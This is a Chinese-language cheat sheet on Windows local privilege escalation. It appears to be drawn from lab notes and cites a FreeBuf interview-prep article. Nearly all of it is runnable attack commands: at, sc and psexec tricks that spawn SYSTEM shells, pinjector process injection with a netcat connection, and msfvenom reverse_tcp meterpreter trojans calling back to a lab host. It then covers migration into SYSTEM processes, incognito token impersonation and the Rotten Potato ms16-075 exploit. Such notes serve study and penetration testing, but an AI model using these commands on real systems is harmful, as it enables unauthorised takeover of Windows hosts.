0x01 AT&SC&PS命令提权

1.at命令提权

at是一个计划任务的命令，当调用计划任务是以system权限运行的，就实现提权

当取得普通用户可以登录时可以使用此方法提权，本地用户提权

win2003及以下版本试用

环境：win2003

at 16:40 /interactive cmd #在生成system权限的cmd

2、sc命令提权

sc是用于与服务控制管理器和服务进行通信的命令行程序。提供的功能类似于控制面板中管理工具项中的服务。

适用版本：windows 7、8、03、08、12、16

当取得普通用户可以登录时可以使用此方法提权，本地用户提权

windows2003 成功，但是其他版本没有成功

环境：win2003

#创建一个名叫syscmd的新的交互式的cmd执行服务
sc Create syscmd binPath= "cmd /K start" type= own type= interact
#运行服务
sc start syscmd

3、ps提权

pstools是微软官方自带的工具，可以用来帮助管理系统

当取得普通用户可以登录时可以使用此方法提权，本地用户提权

环境：win2016

psexec.exe -accepteula -s -i -d cmd #调用运行cmd

0x02 进程迁移注入提权

注入到其他以system运行的进程中

当取得普通用户可以登录时可以使用此方法提权，本地用户提权

1.pinjector进程注入

环境：win2003

工具：pinjector

pinjector -l
pinjector -p 420 cmd 3344
nc 192.168.46.149 3344

2.MSF进程注入

环境：win2016 administrator

进行进程注入时，当权限过低时是迁移失败的

#生成木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.85.129 LPORT=3333 -f exe -o msf.exe
开启监听
use multi/handler
set payload windows/windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 3333
#进程注入
ps   //查看进程
migrate PID   //迁移对应PID，找是system的权限运行的进程

0x03 令牌窃取提权

假冒令牌可以假冒一个网络中的另一个用户进行各类操作。

所以当一个攻击者需要域管理员的操作权限时候，需通过假冒域管理员的令牌进行攻击。

1.令牌窃取提权

环境：Win2008 administator

当取得普通用户可以登录时可以使用此方法提权，本地用户提权

进行令牌窃取时，当权限过低时是窃取失败的，找不到system的令牌

#生成木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.85.129 LPORT=3333 -f exe -o msf.exe
#开启监听
use multi/handler
set payload windows/windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 3333
#进行令牌窃取
use incognito
list_tokens -u           #列出有的令牌
impersonate_token "NT AUTHORITY\SYSTEM" #窃取system令牌

2.烂土豆ms16-075提权

烂土豆本质上其实也是一种令牌窃取类型的提权

烂土豆可以本地也可以在web上提权

环境：win7+iis+asp iis低权限用户

#生成木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.85.129 LPORT=3333 -f exe -o msf.exe
#开启监听
use multi/handler
set payload windows/windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 3333
#进行令牌窃取
execute -cH -f ./potato.exe //配合烂土豆
use incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"

或使用msf对应的模块

#生成木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.85.129 LPORT=3333 -f exe -o msf.exe
#开启监听
use multi/handler
set payload windows/windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 3333
#使用烂土豆
use exploit/windows/local/ms16_075_reflection-juicy
set session 1
set lhost 0.0.0.0
run

但是如果用户是本地非administrator用户，有这个漏洞也是利用失败的

需要是以下用户才可以成功提权

管理员(admininstrator)或者本地的服务账户

由服务控制管理器启动的服务

由组件对象模型 (COM) 基础结构启动的并配置为在特定帐户下运行的COM服务器

IIS与SqlServer用户

参考文章：

Windows系列本地提权面试相关问题汇总 - FreeBuf网络安全行业门户